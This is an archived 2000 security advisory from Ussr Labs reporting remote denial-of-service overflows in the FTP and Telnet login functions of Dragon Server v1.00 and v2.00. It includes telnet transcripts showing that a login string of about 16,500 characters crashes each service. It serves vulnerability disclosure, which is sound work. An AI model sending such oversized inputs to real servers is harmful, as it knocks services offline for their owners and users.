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Multiples Remotes DoS Attacks in Dragon Server v1.00 and v2.00 Vulnerability


From: labs () USSRBACK COM (Ussr Labs)
Date: Fri, 16 Jun 2000 02:10:54 -0300


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Multiples Remotes DoS Attacks in Dragon Server v1.00 and v2.00
Vulnerability

USSR Advisory Code:   USSR-2000046

Release Date:
June 16, 2000

Systems Affected:
Dragon Server v2.00
Dragon Server v1.00

THE PROBLEM

The Ussr Labs team has recently discovered a null memory problem in
the Dragon Server,

Ussr Labs found multiple places in Dragon Server where they do not
use proper bounds checking.
The following all result in a Denial of Service against the service
in question.

SPECIAL NOTE: That we take no responsibility for this code it is for
educational purposes only.

Example:
The Ftp Server (Port 21) service has a overflow in the login
function.

[hellme () die-communitech net$ telnet example.com 21
Trying example.com...
Connected to example.com.
Escape character is '^]'.

220 Dragon Server v2.0, ready.
USER [buffer]

Where [buffer] is aprox. 16500 characters.

and the process containg the service crash

Example 2:
The Telnet Server (Port 23) service has a overflow in the login
function.

[hellme () die-communitech net$ telnet example.com
Trying example.com...
Connected to example.com.
Escape character is '^]'.

Dragon Server v2.0, ready.

Login:   [buffer]

Where [buffer] is aprox. 16500 characters.

and the process containg the service crash

Vendor Status:
Informed!

Vendor   Url: http://www.shadowopsoftware.com/
Program  Url: http://www.shadowopsoftware.com/ds-index.html

Related Links:

Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Technotronic and Wiretrip.

Copyright (c) 1999-2000 Underground Security Systems Research.
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